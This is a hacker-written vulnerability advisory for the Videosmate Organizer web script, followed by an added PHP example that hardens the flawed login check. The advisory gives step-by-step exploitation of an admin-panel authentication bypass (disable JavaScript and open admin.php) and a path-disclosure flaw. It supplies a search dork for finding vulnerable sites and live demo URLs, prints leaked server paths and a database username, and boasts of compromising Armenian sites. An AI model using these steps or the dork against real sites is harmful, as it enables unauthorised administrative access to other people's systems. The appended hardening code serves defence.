`=====================================================================
Vulnerable software: Videosmate Organizer V 4.2 (all versions)
Vendor: http://videosmate.com/
Software License: Commercial
Vulns: Authentication Bypass & Path Disclosure
Risk: Critical
Dork: intext:Powered by Videosmate Organizer
=====================================================================
Vuln Description:
As I noted above, this script is commercial, and that's why today I'm unable (maybe lazy) to show you where the vulnerability is.
I discovered this vulnerability while owning Armenian sites.
The flaw is that if the remote user is not authenticated against the admin panel ( somesite.tld/sitedb/admin/ ),
it seems the script (after the session checking thing) is unable to properly kill its execution.
Since I have no access to the source code of this script, I'll try to imagine how this process goes:
Suppose:
<?php
session_start();
if (!isset($_SESSION['am_i_admin_or_am_i_logged_in_admin'])) echo "<script>self.location='login.php';</script>";
/*
Notice:
echo 'JS_REDIRECTION';
** not **
die('JS_REDIRECTION');
*/
/****** PWNED ********/
//YOU ARE ADMIN HERE//
?>
Exploitation is simple like 2x2:
Disable javascript in your browser and follow to: site.tld/sitedb/admin/admin.php
(If you wonder, then press CTRL+U and you will see something like:
<script> self.location='login.php';</script>
<script> self.location='login.php';</script>
)
Demo: http://www.videosmate.com/componentdemo/sitedb/admin/admin.php (<=Disable javascript in your browser or use NoScript then surf there)
This is not the end!! 111))
PATH DISCLOSURE: Direct access to:
site.tld/componentdemo/include/categoryfuncs.php
Demo:
http://www.videosmate.com/componentdemo/include/categoryfuncs.php
Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
Warning: include() [function.include]: Failed opening './settings/conf.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
Warning: mysql_query() [function.mysql-query]: Access denied for user 'alphonse'@'localhost' (using password: NO) in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
Error, query failed
Please note that: I'm not responsible for any damage if the target site !='.am' domain xD))
=====================================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
=====================================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua
to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
=====================================================================
/AkaStep
`
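Added example (not part of the original advisory and not the vendor's code): a hardened form of the session check imagined above, plus a guard against the direct include-file access that produced the path disclosure. The session key and login.php come from the advisory's snippet; require_admin() and INCLUDED_BY_APP are hypothetical names, and the real application layout is assumed.

```php
<?php
// Added example: hardened admin guard (not the vendor's code).
// require_admin() and INCLUDED_BY_APP are hypothetical names; the session
// key and login.php are reused from the advisory's imagined snippet.
declare(strict_types=1);

// Path disclosure: keep PHP warnings out of HTTP responses, log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['am_i_admin_or_am_i_logged_in_admin'])) {
        // Server-side redirect: does not rely on the client running JavaScript.
        header('Location: login.php', true, 302);
        // Terminate so nothing after this call is executed or sent.
        exit;
    }
}

// Entry points (e.g. admin.php) define this marker before including anything.
define('INCLUDED_BY_APP', true);
require_admin();

// --- top of each include-only file, such as include/categoryfuncs.php ---
// A direct request never defines the marker, so it ends here, before any
// include() or database call can fail and print a filesystem path.
if (!defined('INCLUDED_BY_APP')) {
    http_response_code(404);
    exit;
}
// Inside include files, resolve paths from __DIR__ rather than './' so they
// do not depend on which script was requested (directory layout assumed).

// Admin-only code below runs only for an authenticated session.
echo 'admin panel';
```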